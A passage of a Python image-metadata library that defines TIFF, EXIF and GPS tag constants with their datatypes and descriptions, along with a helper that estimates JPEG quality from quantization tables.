})
CleanFaxData = TiffConstantSet('CleanFaxData', {
0: {'name': 'All'},
1: {'name': 'Regenerated'},
2: {'name': 'Present'},
})
InkSet = TiffConstantSet('InkSet', {
1: {'name': 'CMYK'},
2: {'name': 'NotCMYK'},
})
ExtraSamples = TiffConstantSet('ExtraSamples', {
0: {'name': 'Unspecified'},
1: {'name': 'AssociatedAlpha'},
2: {'name': 'UnassociatedAlpha'},
})
SampleFormat = TiffConstantSet('SampleFormat', {
1: {'name': 'uint', 'altnames': {'UnsignedInteger'}},
2: {'name': 'int'},
3: {'name': 'float', 'altnames': {'IEEEFP'}},
4: {'name': 'Undefined'},
5: {'name': 'ComplexInt'},
6: {'name': 'ComplexFloat'},
})
Indexed = TiffConstantSet('Indexed', {
0: {'name': 'NotIndexed'},
1: {'name': 'Indexed'},
})
JPEGProc = TiffConstantSet('JPEGProc', {
1: {'name': 'Baseline'},
2: {'name': 'LosslessHuffman'},
})
JPEGLosslessPredictors = TiffConstantSet('JPEGLosslessPredictors', {
1: {'name': 'A'},
2: {'name': 'B'},
3: {'name': 'C'},
4: {'name': 'AplusBminusC'},
5: {'name': 'AplusHalfBminusC'},
6: {'name': 'BplusHalhAminusC'},
7: {'name': 'HalfAplusB'},
})
YCbCrPositioning = TiffConstantSet('YCbCrPositioning', {
1: {'name': 'Centered'},
2: {'name': 'Cosited'},
})
EXIFTag = TiffConstantSet(TiffTag, {
33434: {'name': 'ExposureTime', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Exposure time'},
33437: {'name': 'FNumber', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'F number'},
34850: {'name': 'ExposureProgram', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Exposure program'},
34852: {'name': 'SpectralSensitivity', 'datatype': Datatype.ASCII, 'desc': 'Spectral sensitivity'},
34855: {'name': 'ISOSpeedRatings', 'datatype': Datatype.SHORT, 'desc': 'ISO speed rating'},
34856: {'name': 'OECF', 'datatype': Datatype.UNDEFINED, 'desc': 'Optoelectric conversion factor'},
34858: {'datatype': Datatype.SSHORT, 'name': 'TimeZoneOffset'},
34859: {'datatype': Datatype.SHORT, 'name': 'SelfTimerMode'},
36864: {'name': 'SensitivityType'},
34865: {'datatype': Datatype.LONG, 'name': 'StandardOutputSensitivity'},
34866: {'datatype': Datatype.LONG, 'name': 'RecommendedExposureIndex'},
34867: {'name': 'ISOSPEED'},
34868: {'name': 'ISOSPEEDLATITUDEYYY'},
34869: {'name': 'ISOSPEEDLATITUDEZZZ'},
36867: {'name': 'DateTimeOriginal', 'datatype': Datatype.ASCII, 'count': 20, 'desc': 'Date and time of original data'},
36868: {'name': 'DateTimeDigitized', 'datatype': Datatype.ASCII, 'count': 20, 'desc': 'Date and time of digital data'},
34869: {'datatype': Datatype.LONG, 'name': 'ISOSpeedLatitudezzz'},
36864: {'name': 'ExifVersion'},
36867: {'datatype': Datatype.ASCII, 'name': 'DateTimeOriginal'},
36868: {'datatype': Datatype.ASCII, 'name': 'CreateDate'},
36873: {'name': 'GooglePlusUploadCode'},
36880: {'datatype': Datatype.ASCII, 'name': 'OffsetTime'},
36881: {'datatype': Datatype.ASCII, 'name': 'OffsetTimeOriginal'},
36882: {'datatype': Datatype.ASCII, 'name': 'OffsetTimeDigitized'},
37121: {'name': 'ComponentsConfiguration', 'datatype': Datatype.UNDEFINED, 'count': 4, 'desc': ' Meaning of each component'},
37122: {'name': 'CompressedBitsPerPixel', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': ' Image compression mode'},
37377: {'name': 'ShutterSpeedValue', 'datatype': Datatype.SRATIONAL, 'count': 1, 'desc': 'Shutter speed'},
37378: {'name': 'ApertureValue', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Aperture'},
37379: {'name': 'BrightnessValue', 'datatype': Datatype.SRATIONAL, 'count': 1, 'desc': 'Brightness'},
37380: {'name': 'ExposureBiasValue', 'datatype': Datatype.SRATIONAL, 'count': 1, 'desc': 'Exposure bias'},
37381: {'name': 'MaxApertureValue', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Maximum lens aperture'},
37382: {'name': 'SubjectDistance', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Subject distance'},
37383: {'name': 'MeteringMode', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Metering mode'},
37384: {'name': 'LightSource', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Light source'},
37385: {'name': 'Flash', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Flash'},
37386: {'name': 'FocalLength', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Lens focal length'},
37393: {'datatype': Datatype.LONG, 'name': 'ImageNumber'},
37394: {'datatype': Datatype.ASCII, 'name': 'SecurityClassification'},
37395: {'datatype': Datatype.ASCII, 'name': 'ImageHistory'},
37396: {'name': 'SubjectArea', 'datatype': Datatype.SHORT, 'desc': 'Subject area'},
37500: {'name': 'MakerNote', 'datatype': Datatype.UNDEFINED, 'desc': ' Manufacturer notes'},
37510: {'name': 'UserComment', 'datatype': Datatype.UNDEFINED, 'desc': ' User comments'},
37520: {'name': 'SubSecTime', 'datatype': Datatype.ASCII, 'desc': ' DateTime subseconds'},
37521: {'name': 'SubSecTimeOriginal', 'datatype': Datatype.ASCII, 'desc': ' DateTimeOriginal subseconds'},
37522: {'name': 'SubSecTimeDigitized', 'datatype': Datatype.ASCII, 'desc': ' DateTimeDigitized subseconds'},
37888: {'datatype': Datatype.SRATIONAL, 'name': 'AmbientTemperature', 'altnames': {'Temperature'}},
37889: {'datatype': Datatype.RATIONAL, 'name': 'Humidity'},
37890: {'datatype': Datatype.RATIONAL, 'name': 'Pressure'},
37891: {'datatype': Datatype.SRATIONAL, 'name': 'WaterDepth'},
37892: {'datatype': Datatype.RATIONAL, 'name': 'Acceleration'},
37893: {'datatype': Datatype.SRATIONAL, 'name': 'CameraElevationAngle'},
40960: {'name': 'FlashpixVersion', 'datatype': Datatype.UNDEFINED, 'count': 4, 'desc': 'Supported Flashpix version'},
40961: {'name': 'ColorSpace', 'datatype': Datatype.SHORT, 'count': 1, 'desc': ' Color space information'},
40962: {'name': 'PixelXDimension', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'Valid image width'},
40963: {'name': 'PixelYDimension', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'Valid image height'},
40964: {'name': 'RelatedSoundFile', 'datatype': Datatype.ASCII, 'count': 13, 'desc': ' Related audio file'},
41483: {'name': 'FlashEnergy', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Flash energy'},
41484: {'name': 'SpatialFrequencyResponse', 'datatype': Datatype.UNDEFINED, 'desc': 'Spatial frequency response'},
41486: {'name': 'FocalPlaneXResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Focal plane X resolution'},
41487: {'name': 'FocalPlaneYResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Focal plane Y resolution'},
41488: {'name': 'FocalPlaneResolutionUnit', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Focal plane resolution unit'},
41492: {'name': 'SubjectLocation', 'datatype': Datatype.SHORT, 'count': 2, 'desc': 'Subject location'},
41493: {'name': 'ExposureIndex', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Exposure index'},
41495: {'name': 'SensingMethod', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Sensing method'},
41728: {'name': 'FileSource', 'datatype': Datatype.UNDEFINED, 'count': 1, 'desc': 'File source'},
41729: {'name': 'SceneType', 'datatype': Datatype.UNDEFINED, 'count': 1, 'desc': 'Scene type'},
41730: {'name': 'CFAPattern', 'datatype': Datatype.UNDEFINED, 'desc': 'CFA pattern'},
41985: {'name': 'CustomRendered', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Custom image processing'},
41986: {'name': 'ExposureMode', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Exposure mode'},
41987: {'name': 'WhiteBalance', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'White balance'},
41988: {'name': 'DigitalZoomRatio', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Digital zoom ratio'},
41989: {'name': 'FocalLengthIn35mmFilm', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Focal length in 35 mm film'},
41990: {'name': 'SceneCaptureType', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Scene capture type'},
41991: {'name': 'GainControl', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Gain control'},
41992: {'name': 'Contrast', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Contrast'},
41993: {'name': 'Saturation', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Saturation'},
41994: {'name': 'Sharpness', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Sharpness'},
41995: {'name': 'DeviceSettingDescription', 'datatype': Datatype.UNDEFINED, 'desc': 'Device settings description'},
41996: {'name': 'SubjectDistanceRange', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'Subject distance range'},
42016: {'name': 'ImageUniqueID', 'datatype': Datatype.ASCII, 'count': 33, 'desc': ' Unique image ID'},
42032: {'datatype': Datatype.ASCII, 'name': 'OwnerName'},
42033: {'datatype': Datatype.ASCII, 'name': 'SerialNumber'},
42034: {'datatype': Datatype.RATIONAL, 'name': 'LensInfo'},
42035: {'datatype': Datatype.ASCII, 'name': 'LensMake'},
42036: {'datatype': Datatype.ASCII, 'name': 'LensModel'},
42037: {'datatype': Datatype.ASCII, 'name': 'LensSerialNumber'},
42080: {'datatype': Datatype.SHORT, 'name': 'CompositeImage'},
42081: {'datatype': Datatype.SHORT, 'name': 'CompositeImageCount'},
42082: {'name': 'CompositeImageExposureTimes'},
42240: {'datatype': Datatype.RATIONAL, 'name': 'Gamma'},
59932: {'name': 'Padding'},
59933: {'datatype': Datatype.SLONG, 'name': 'OffsetSchema'},
65000: {'datatype': Datatype.ASCII, 'name': 'OwnerName'},
65001: {'datatype': Datatype.ASCII, 'name': 'SerialNumber'},
65002: {'datatype': Datatype.ASCII, 'name': 'Lens'},
65100: {'datatype': Datatype.ASCII, 'name': 'RawFile'},
65101: {'datatype': Datatype.ASCII, 'name': 'Converter'},
65102: {'datatype': Datatype.ASCII, 'name': 'WhiteBalance'},
65105: {'datatype': Datatype.ASCII, 'name': 'Exposure'},
65106: {'datatype': Datatype.ASCII, 'name': 'Shadows'},
65107: {'datatype': Datatype.ASCII, 'name': 'Brightness'},
65108: {'datatype': Datatype.ASCII, 'name': 'Contrast'},
65109: {'datatype': Datatype.ASCII, 'name': 'Saturation'},
65110: {'datatype': Datatype.ASCII, 'name': 'Sharpness'},
65111: {'datatype': Datatype.ASCII, 'name': 'Smoothness'},
65112: {'datatype': Datatype.ASCII, 'name': 'MoireFilter'},
})
GPSTag = TiffConstantSet(TiffTag, {
0: {'name': 'GPSVersionID', 'datatype': Datatype.BYTE, 'count': 4, 'desc': 'GPS tag version'},
1: {'name': 'GPSLatitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'North or South Latitude'},
2: {'name': 'GPSLatitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Latitude'},
3: {'name': 'GPSLongitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'East or West Longitude'},
4: {'name': 'GPSLongitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Longitude'},
5: {'name': 'GPSAltitudeRef', 'datatype': Datatype.BYTE, 'count': 1, 'desc': 'Altitude reference'},
6: {'name': 'GPSAltitude', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Altitude'},
7: {'name': 'GPSTimeStamp', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'GPS time (atomic clock)'},
8: {'name': 'GPSSatellites', 'datatype': Datatype.ASCII, 'desc': 'GPS satellites used for measurement'},
9: {'name': 'GPSStatus', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'GPS receiver status'},
10: {'name': 'GPSMeasureMode', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'GPS measurement mode'},
11: {'name': 'GPSDOP', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Measurement precision'},
12: {'name': 'GPSSpeedRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Speed unit'},
13: {'name': 'GPSSpeed', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Speed of GPS receiver'},
14: {'name': 'GPSTrackRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for direction of movement'},
15: {'name': 'GPSTrack', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Direction of movement'},
16: {'name': 'GPSImgDirectionRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for direction of image'},
17: {'name': 'GPSImgDirection', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Direction of image'},
18: {'name': 'GPSMapDatum', 'datatype': Datatype.ASCII, 'desc': 'Geodetic survey data used'},
19: {'name': 'GPSDestLatitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for latitude of destination'},
20: {'name': 'GPSDestLatitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Latitude of destination'},
21: {'name': 'GPSDestLongitudeRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for longitude of destination'},
22: {'name': 'GPSDestLongitude', 'datatype': Datatype.RATIONAL, 'count': 3, 'desc': 'Longitude of destination'},
23: {'name': 'GPSDestBearingRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for bearing of destination'},
24: {'name': 'GPSDestBearing', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Bearing of destination'},
25: {'name': 'GPSDestDistanceRef', 'datatype': Datatype.ASCII, 'count': 2, 'desc': 'Reference for distance to destination'},
26: {'name': 'GPSDestDistance', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'Distance to destination'},
27: {'name': 'GPSProcessingMethod', 'datatype': Datatype.UNDEFINED, 'desc': 'Name of GPS processing method'},
28: {'name': 'GPSAreaInformation', 'datatype': Datatype.UNDEFINED, 'desc': 'Name of GPS area'},
29: {'name': 'GPSDateStamp', 'datatype': Datatype.ASCII, 'count': 11, 'desc': 'GPS date'},
30: {'name': 'GPSDifferential', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'GPS differential correction'},
31: {'name': 'GPSPositioningError', 'desc': 'Indicates horizontal positioning errors in meters'},
})
InteroperabilityTag = TiffConstantSet(TiffTag, {
1: {'name': 'InteroperabilityIndex', 'datatype': Datatype.ASCII},
})
def EstimateJpegQuality(jpegTables):
try:
qtables = jpegTables.split(b'\xff\xdb', 1)[1]
qtables = qtables[2:struct.unpack('>H', qtables[:2])[0]]
# Only process the first table
if not (qtables[0] & 0xF):
values = struct.unpack('>64' + ('H' if qtables[0] else 'B'), qtables[1:1 + 64 * (2 if qtables[0] else 1)])
if values[58] < 100:
return int(100 - values[58] / 2)
return int(5000.0 / 2.5 / values[15])
except Exception:
pass
Tag = TiffConstantSet(TiffTag, {
254: {'name': 'NewSubfileType', 'altnames': {'SubfileType'}, 'datatype': Datatype.LONG, 'count': 1, 'bitfield': NewSubfileType, 'desc': 'A general indication of the kind of data contained in this subfile', 'default': 0},
255: {'name': 'OldSubfileType', 'datatype': Datatype.SHORT, 'count': 1, 'enum': OldSubfileType, 'desc': 'A general indication of the kind of data contained in this subfile. See NewSubfileType'},
256: {'name': 'ImageWidth', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'The number of columns in the image, i.e., the number of pixels per scanline'},
257: {'name': 'ImageLength', 'altnames': {'ImageHeight'}, 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'The number of rows (sometimes described as scanlines) in the image'},
258: {'name': 'BitsPerSample', 'datatype': Datatype.SHORT, 'desc': 'Number of bits per component', 'default': 1},
259: {'name': 'Compression', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Compression, 'desc': 'Compression scheme used on the image data'},
262: {'name': 'Photometric', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Photometric, 'desc': 'The color space of the image data'},
263: {'name': 'Threshholding', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Thresholding, 'desc': 'For black and white TIFF files that represent shades of gray, the technique used to convert from gray to black and white pixels'},
264: {'name': 'CellWidth', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The width of the dithering or halftoning matrix used to create a dithered or halftoned bilevel file'},
265: {'name': 'CellLength', 'altnames': {'CellHeight'}, 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The length of the dithering or halftoning matrix used to create a dithered or halftoned bilevel file'},
266: {'name': 'FillOrder', 'datatype': Datatype.SHORT, 'count': 1, 'enum': FillOrder, 'desc': 'The logical order of bits within a byte'},
269: {'name': 'DocumentName', 'datatype': Datatype.ASCII, 'desc': 'The name of the document from which this image was scanned'},
270: {'name': 'ImageDescription', 'datatype': Datatype.ASCII, 'desc': 'A string that describes the subject of the image'},
271: {'name': 'Make', 'datatype': Datatype.ASCII, 'desc': 'The scanner manufacturer'},
272: {'name': 'Model', 'datatype': Datatype.ASCII, 'desc': 'The scanner model name or number'},
273: {'name': 'StripOffsets', 'datatype': (Datatype.SHORT, Datatype.LONG, Datatype.LONG8), 'bytecounts': 'StripByteCounts', 'desc': 'The byte offset of each strip with respect to the beginning of the TIFF file'},
274: {'name': 'Orientation', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Orientation, 'desc': 'The orientation of the image with respect to the rows and columns'},
277: {'name': 'SamplesPerPixel', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The number of components per pixel'},
278: {'name': 'RowsPerStrip', 'datatype': (Datatype.SHORT, Datatype.LONG), 'count': 1, 'desc': 'The number of rows per strip'},
279: {'name': 'StripByteCounts', 'datatype': (Datatype.SHORT, Datatype.LONG, Datatype.LONG8), 'desc': 'For each strip, the number of bytes in the strip after compression'},
280: {'name': 'MinSampleValue', 'datatype': Datatype.SHORT, 'desc': 'The minimum component value used'},
281: {'name': 'MaxSampleValue', 'datatype': Datatype.SHORT, 'desc': 'The maximum component value used'},
282: {'name': 'XResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The number of pixels per ResolutionUnit in the ImageWidth direction'},
283: {'name': 'YResolution', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The number of pixels per ResolutionUnit in the ImageLength direction'},
284: {'name': 'PlanarConfig', 'datatype': Datatype.SHORT, 'count': 1, 'enum': PlanarConfig, 'desc': 'How the components of each pixel are stored'},
285: {'name': 'PageName', 'datatype': Datatype.ASCII, 'desc': 'The name of the page from which this image was scanned'},
286: {'name': 'Xposition', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The X offset in ResolutionUnits of the left side of the image, with respect to the left side of the page'},
287: {'name': 'Yposition', 'datatype': Datatype.RATIONAL, 'count': 1, 'desc': 'The Y offset in ResolutionUnits of the top of the image, with respect to the top of the page'},
288: {'name': 'FreeOffsets', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 'FreeByteCounts', 'desc': 'For each string of contiguous unused bytes in a TIFF file, the byte offset of the string'},
289: {'name': 'FreeByteCounts', 'datatype': (Datatype.LONG, Datatype.LONG8), 'desc': 'For each string of contiguous unused bytes in a TIFF file, the number of bytes in the string'},
290: {'name': 'GrayResponseUnit', 'altnames': {'GreyResponseUnit'}, 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The precision of the information contained in the GrayResponseCurve. The denominator is 10^(this value)', 'default': 2},
291: {'name': 'GrayResponseCurve', 'altnames': {'GreyResponseCurve'}, 'datatype': Datatype.SHORT, 'desc': 'For grayscale data, the optical density of each possible pixel value'},
292: {'name': 'T4Options', 'altnames': {'Group3Options'}, 'datatype': Datatype.LONG, 'count': 1, 'bitfield': T4Options, 'default': 0},
293: {'name': 'T6Options', 'altnames': {'Group4Options'}, 'datatype': Datatype.LONG, 'count': 1, 'bitfield': T6Options, 'default': 0},
296: {'name': 'ResolutionUnit', 'datatype': Datatype.SHORT, 'count': 1, 'enum': ResolutionUnit, 'desc': 'Units for XResolution and YResolution', 'default': ResolutionUnit.Inch},
297: {'name': 'PageNumber', 'datatype': Datatype.SHORT, 'count': 2, 'desc': '0-based page number of the document and total pages of the document'},
300: {'name': 'ColorResponseUunit', 'datatype': Datatype.SHORT, 'count': 1, 'desc': 'The precision of the information contained in the GrayResponseCurve. The denominator is 10^(this value)'},
301: {'name': 'TransferFunction', 'datatype': Datatype.SHORT, 'desc': 'Describes a transfer function for the image in tabular style'},
305: {'name': 'Software', 'datatype': Datatype.ASCII, 'desc': 'Name and version number of the software package(s) used to create the image'},
306: {'name': 'DateTime', 'datatype': Datatype.ASCII, 'count': 20, 'desc': 'Date and time of image creation', 'format': '%Y:%m:%d %H:%M:%S'},
315: {'name': 'Artist', 'datatype': Datatype.ASCII, 'desc': 'Person who created the image'},
316: {'name': 'HostComputer', 'datatype': Datatype.ASCII, 'desc': 'The computer and/or operating system in use at the time of image creation'},
317: {'name': 'Predictor', 'datatype': Datatype.SHORT, 'count': 1, 'enum': Predictor, 'desc': 'A predictor to apply before encoding', 'default': Predictor['None']},
318: {'name': 'WhitePoint', 'datatype': Datatype.RATIONAL, 'count': 2, 'desc': 'The chromaticity of the white point of the image'},
319: {'name': 'PrimaryChromaticities', 'datatype': Datatype.RATIONAL, 'count': 6, 'desc': 'The chromaticities of the primaries of the image'},
320: {'name': 'ColorMap', 'datatype': Datatype.SHORT, 'desc': 'This field defines a Red-Green-Blue color map for palette color images'},
321: {'name': 'HalftoneHints', 'datatype': Datatype.SHORT, 'count': 2},
322: {'name': 'TileWidth', 'datatype': (Datatype.SHORT, Datatype.LONG), 'desc': 'The tile width in pixels'},
323: {'name': 'TileLength', 'altnames': {'TileHeight'}, 'datatype': (Datatype.SHORT, Datatype.LONG), 'desc': 'The tile length (height) in pixels'},
324: {'name': 'TileOffsets', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 'TileByteCounts', 'desc': 'For each tile, the byte offset of that tile'},
325: {'name': 'TileByteCounts', 'datatype': (Datatype.LONG, Datatype.LONG8), 'desc': 'For each tile, the number of (compressed) bytes in that tile'},
326: {'name': 'BadFaxLines', 'datatype': (Datatype.SHORT, Datatype.LONG)},
327: {'name': 'CleanFaxData', 'datatype': Datatype.SHORT, 'count': 1, 'enum': CleanFaxData},
328: {'name': 'ConsecutiveBadFaxLines', 'datatype': (Datatype.SHORT, Datatype.LONG)},
330: {'name': 'SubIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'desc': 'A list of additional images'},
332: {'name': 'InkSet', 'datatype': Datatype.SHORT, 'count': 1, 'enum': InkSet},
333: {'name': 'InkNames', 'datatype': Datatype.ASCII},
334: {'name': 'NumberOfInks', 'datatype': Datatype.SHORT, 'count': 1},
336: {'name': 'DotRange', 'datatype': (Datatype.BYTE, Datatype.SHORT)},
337: {'name': 'TargetPrinter', 'datatype': Datatype.ASCII},
338: {'name': 'ExtraSamples', 'datatype': Datatype.SHORT, 'count': 1, 'enum': ExtraSamples},
339: {'name': 'SampleFormat', 'datatype': Datatype.SHORT, 'enum': SampleFormat, 'desc': 'How to interpret each data sample in a pixel', 'default': SampleFormat.UINT},
340: {'name': 'SMinSampleValue', 'desc': 'The minimum sample value'},
341: {'name': 'SMaxSampleValue', 'desc': 'The maximum sample value'},
343: {'name': 'ClipPath', 'datatype': Datatype.BYTE},
344: {'name': 'XClipPathUnits', 'datatype': Datatype.DWORD},
345: {'name': 'YClipPathUnits', 'datatype': Datatype.DWORD},
346: {'name': 'Indexed', 'datatype': Datatype.SHORT, 'enum': Indexed, 'desc': 'Indexed images are images where the pixels do not represent color values, but rather an index', 'default': Indexed.NotIndexed},
347: {'name': 'JPEGTables', 'datatype': Datatype.UNDEFINED, 'dump': lambda val: ('estimated quality: %d' % EstimateJpegQuality(val) if EstimateJpegQuality(val) else None)},
351: {'name': 'OpiProxy'},
400: {'name': 'GlobalParametersIFD', 'datatype': (Datatype.IFD, Datatype.IFD8)},
401: {'name': 'ProfileType'},
402: {'name': 'FaxProfile'},
403: {'name': 'CodingMethods'},
404: {'name': 'VersionYear'},
405: {'name': 'ModeNumber'},
433: {'name': 'Decode'},
434: {'name': 'ImageBaseColor'},
435: {'name': 'T82Options'},
512: {'name': 'JPEGProc', 'datatype': Datatype.SHORT, 'count': 1, 'enum': JPEGProc},
513: {'name': 'JPEGIFOffset', 'datatype': (Datatype.LONG, Datatype.LONG8), 'count': 1, 'bytecounts': 'JPEGIFByteCount'},
514: {'name': 'JPEGIFByteCount', 'datatype': (Datatype.LONG, Datatype.LONG8), 'count': 1},
515: {'name': 'JPEGRestartInterval', 'datatype': Datatype.SHORT, 'count': 1},
517: {'name': 'JPEGLosslessPredictors', 'datatype': Datatype.SHORT, 'enum': JPEGLosslessPredictors},
518: {'name': 'JPEGPointTransform', 'datatype': Datatype.SHORT},
519: {'name': 'JPEGQTables', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 64},
520: {'name': 'JPEGDCTables', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 16 + 17},
521: {'name': 'JPEGACTables', 'datatype': (Datatype.LONG, Datatype.LONG8), 'bytecounts': 16 + 256},
529: {'name': 'YCbCrCoefficients', 'datatype': Datatype.RATIONAL, 'count': 3},
530: {'name': 'YCbCrSubsampling', 'datatype': Datatype.SHORT, 'count': 2},
531: {'name': 'YCbCrPositioning', 'datatype': Datatype.SHORT, 'count': 1, 'enum': YCbCrPositioning},
532: {'name': 'ReferenceBlackWhite', 'datatype': Datatype.RATIONAL, 'count': 6},
559: {'name': 'StripRowCounts', 'datatype': Datatype.LONG},
700: {'name': 'XMLPacket'},
32781: {'name': 'OPIImageID'},
32932: {'name': 'WangAnnotation'},
32953: {'name': 'RefPts'},
32954: {'name': 'RegionTackPoint'},
32955: {'name': 'RegionWarpCorners'},
32956: {'name': 'RegionAffine'},
32995: {'name': 'Matteing'},
32996: {'name': 'Datatype'},
32997: {'name': 'ImageDepth'},
32998: {'name': 'TileDepth'},
33300: {'name': 'PIXAR_ImageFullWidth'},
33301: {'name': 'PIXAR_ImageFullLength', 'altnames': {'PIXAR_ImageFullHeight'}},
33302: {'name': 'PIXAR_TextureFormat'},
33303: {'name': 'PIXAR_WrapModes'},
33304: {'name': 'PIXAR_FovCot'},
33305: {'name': 'PIXAR_Matrix_WorldToScreen'},
33306: {'name': 'PIXAR_Matrix_WorldToCamera'},
33405: {'name': 'WriterSerialNumber'},
33421: {'name': 'CFARepeatPatternDim'},
33422: {'name': 'CFAPattern'},
33432: {'name': 'Copyright', 'datatype': Datatype.ASCII},
33445: {'name': 'MDFileTag'},
33446: {'name': 'MDScalePixel'},
33447: {'name': 'MDColorTable'},
33448: {'name': 'MDLabName'},
33449: {'name': 'MDSampleInfo'},
33450: {'name': 'MDPrepDate'},
33451: {'name': 'MDPrepTime'},
33452: {'name': 'MDFileUnits'},
33550: {'name': 'ModelPixelScaleTag'},
33723: {'name': 'RichTiffIPTC'},
33918: {'name': 'INGRPacketDataTag'},
33919: {'name': 'INGRFlagRegisters'},
33920: {'name': 'IrasBTransformationMatrix'},
33922: {'name': 'ModelTiepointTag'},
34016: {'name': 'IT8Site'},
34017: {'name': 'IT8ColorSequence'},
34018: {'name': 'IT8Header'},
34019: {'name': 'IT8RasterPadding'},
34020: {'name': 'IT8BitsPerRunLength'},
34021: {'name': 'IT8BitsPerExtendedRunLength'},
34022: {'name': 'IT8ColorTable'},
34023: {'name': 'IT8ImageColorIndicator'},
34024: {'name': 'IT8BkgColorIndicator'},
34025: {'name': 'IT8ImageColorValue'},
34026: {'name': 'IT8BkgColorValue'},
34027: {'name': 'IT8PixelIntensityRange'},
34028: {'name': 'IT8TransparencyIndicator'},
34029: {'name': 'IT8ColorCharacterization'},
34030: {'name': 'IT8HCUsage'},
34031: {'name': 'IT8TrapIndicator'},
34032: {'name': 'IT8CMYKEquivalent'},
34232: {'name': 'FrameCount'},
34264: {'name': 'ModelTransformationTag'},
34377: {'name': 'Photoshop'},
34665: {'name': 'EXIFIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'tagset': EXIFTag},
34675: {'name': 'ICCProfile'},
34732: {'name': 'ImageLayer'},
34735: {'name': 'GeoKeyDirectoryTag'},
34736: {'name': 'GeoDoubleParamsTag'},
34737: {'name': 'GeoAsciiParamsTag'},
34750: {'name': 'JBIGOptions'},
34853: {'name': 'GPSIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'tagset': GPSTag},
34908: {'name': 'FaxRecvParams'},
34909: {'name': 'FaxSubaddress'},
34910: {'name': 'FaxRecvTime'},
34911: {'name': 'FAXDCS'},
34929: {'name': 'FEDEX_EDR'},
37439: {'name': 'StoNits'},
37724: {'name': 'ImageSourceData'},
40965: {'name': 'InteroperabilityIFD', 'datatype': (Datatype.IFD, Datatype.IFD8), 'tagset': InteroperabilityTag},
42112: {'name': 'GDAL_Metadata'},
42113: {'name': 'GDAL_NoData'},
50215: {'name': 'OceScanjobDescription'},
50216: {'name': 'OceApplicationSelector'},
50217: {'name': 'OceIdentificationNumber'},
50218: {'name': 'OceImageLogicCharacteristics'},
50674: {'name': 'LERC_PARAMETERS'},
50706: {'name': 'DNGVersion'},
50707: {'name': 'DNGBackwardVersion'},
50708: {'name': 'UniqueCameraModel'},
50709: {'name': 'LocalizedCameraModel'},
50710: {'name': 'CFAPlaneColor'},
